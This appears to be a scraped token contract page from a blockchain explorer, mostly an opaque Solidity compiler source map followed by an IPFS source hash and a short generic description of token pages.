:-1:-1;;;;;89:31:1;;79:42;;69:70;;135:1;132;125:12;150:315;218:6;226;279:2;267:9;258:7;254:23;250:32;247:52;;;295:1;292;285:12;247:52;334:9;321:23;353:31;378:5;353:31;:::i;:::-;403:5;455:2;440:18;;;;427:32;;-1:-1:-1;;;150:315:1:o;662:548::-;774:4;803:2;832;821:9;814:21;864:6;858:13;907:6;902:2;891:9;887:18;880:34;932:1;942:140;956:6;953:1;950:13;942:140;;;1051:14;;;1047:23;;1041:30;1017:17;;;1036:2;1013:26;1006:66;971:10;;942:140;;;946:3;1131:1;1126:2;1117:6;1106:9;1102:22;1098:31;1091:42;1201:2;1194;1190:7;1185:2;1177:6;1173:15;1169:29;1158:9;1154:45;1150:54;1142:62;;;;662:548;;;;:::o;1397:247::-;1456:6;1509:2;1497:9;1488:7;1484:23;1480:32;1477:52;;;1525:1;1522;1515:12;1477:52;1564:9;1551:23;1583:31;1608:5;1583:31;:::i;:::-;1633:5;1397:247;-1:-1:-1;;;1397:247:1:o;1649:456::-;1726:6;1734;1742;1795:2;1783:9;1774:7;1770:23;1766:32;1763:52;;;1811:1;1808;1801:12;1763:52;1850:9;1837:23;1869:31;1894:5;1869:31;:::i;:::-;1919:5;-1:-1:-1;1976:2:1;1961:18;;1948:32;1989:33;1948:32;1989:33;:::i;:::-;1649:456;;2041:7;;-1:-1:-1;;;2095:2:1;2080:18;;;;2067:32;;1649:456::o;2110:180::-;2169:6;2222:2;2210:9;2201:7;2197:23;2193:32;2190:52;;;2238:1;2235;2228:12;2190:52;-1:-1:-1;2261:23:1;;2110:180;-1:-1:-1;2110:180:1:o;2692:248::-;2760:6;2768;2821:2;2809:9;2800:7;2796:23;2792:32;2789:52;;;2837:1;2834;2827:12;2789:52;-1:-1:-1;;2860:23:1;;;2930:2;2915:18;;;2902:32;;-1:-1:-1;2692:248:1:o;2945:118::-;3031:5;3024:13;3017:21;3010:5;3007:32;2997:60;;3053:1;3050;3043:12;3068:382;3133:6;3141;3194:2;3182:9;3173:7;3169:23;3165:32;3162:52;;;3210:1;3207;3200:12;3162:52;3249:9;3236:23;3268:31;3293:5;3268:31;:::i;:::-;3318:5;-1:-1:-1;3375:2:1;3360:18;;3347:32;3388:30;3347:32;3388:30;:::i;:::-;3437:7;3427:17;;;3068:382;;;;;:::o;3924:388::-;3992:6;4000;4053:2;4041:9;4032:7;4028:23;4024:32;4021:52;;;4069:1;4066;4059:12;4021:52;4108:9;4095:23;4127:31;4152:5;4127:31;:::i;:::-;4177:5;-1:-1:-1;4234:2:1;4219:18;;4206:32;4247:33;4206:32;4247:33;:::i;4317:380::-;4396:1;4392:12;;;;4439;;;4460:61;;4514:4;4506:6;4502:17;4492:27;;4460:61;4567:2;4559:6;4556:14;4536:18;4533:38;4530:161;;4613:10;4608:3;4604:20;4601:1;4594:31;4648:4;4645:1;4638:15;4676:4;4673:1;4666:15;4530:161;;4317:380;;;:::o;4702:127::-;4763:10;4758:3;4754:20;4751:1;4744:31;4794:4;4791:1;4784:15;4818:4;4815:1;4808:15;4834:168;4907:9;;;4938;;4955:15;;;4949:22;;4935:37;4925:71;;4976:18;;:::i;5007:217::-;5047:1;5073;5063:132;;5117:10;5112:3;5108:20;5105:1;5098:31;5152:4;5149:1;5142:15;5180:4;5177:1;5170:15;5063:132;-1:-1:-1;5209:9:1;;5007:217::o;5646:125::-;5711:9;;;5732:10;;;5729:36;;;5745:18;;:::i;6156:245::-;6223:6;6276:2;6264:9;6255:7;6251:23;6247:32;6244:52;;;6292:1;6289;6282:12;6244:52;6324:9;6318:16;6343:28;6365:5;6343:28;:::i;10415:401::-;10617:2;10599:21;;;10656:2;10636:18;;;10629:30;10695:34;10690:2;10675:18;;10668:62;-1:-1:-1;;;10761:2:1;10746:18;;10739:35;10806:3;10791:19;;10415:401::o;10821:399::-;11023:2;11005:21;;;11062:2;11042:18;;;11035:30;11101:34;11096:2;11081:18;;11074:62;-1:-1:-1;;;11167:2:1;11152:18;;11145:33;11210:3;11195:19;;10821:399::o;13489:128::-;13556:9;;;13577:11;;;13574:37;;;13591:18;;:::i;14867:127::-;14928:10;14923:3;14919:20;14916:1;14909:31;14959:4;14956:1;14949:15;14983:4;14980:1;14973:15;14999:251;15069:6;15122:2;15110:9;15101:7;15097:23;15093:32;15090:52;;;15138:1;15135;15128:12;15090:52;15170:9;15164:16;15189:31;15214:5;15189:31;:::i;15255:980::-;15517:4;15565:3;15554:9;15550:19;15596:6;15585:9;15578:25;15622:2;15660:6;15655:2;15644:9;15640:18;15633:34;15703:3;15698:2;15687:9;15683:18;15676:31;15727:6;15762;15756:13;15793:6;15785;15778:22;15831:3;15820:9;15816:19;15809:26;;15870:2;15862:6;15858:15;15844:29;;15891:1;15901:195;15915:6;15912:1;15909:13;15901:195;;;15980:13;;-1:-1:-1;;;;;15976:39:1;15964:52;;16071:15;;;;16036:12;;;;16012:1;15930:9;15901:195;;;-1:-1:-1;;;;;;;16152:32:1;;;;16147:2;16132:18;;16125:60;-1:-1:-1;;;16216:3:1;16201:19;16194:35;16113:3;15255:980;-1:-1:-1;;;15255:980:1:o
Swarm Source
ipfs://0a348aada2eee610205e92622c768ed272d839d449e11a9819d4bf08b7973c5d
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.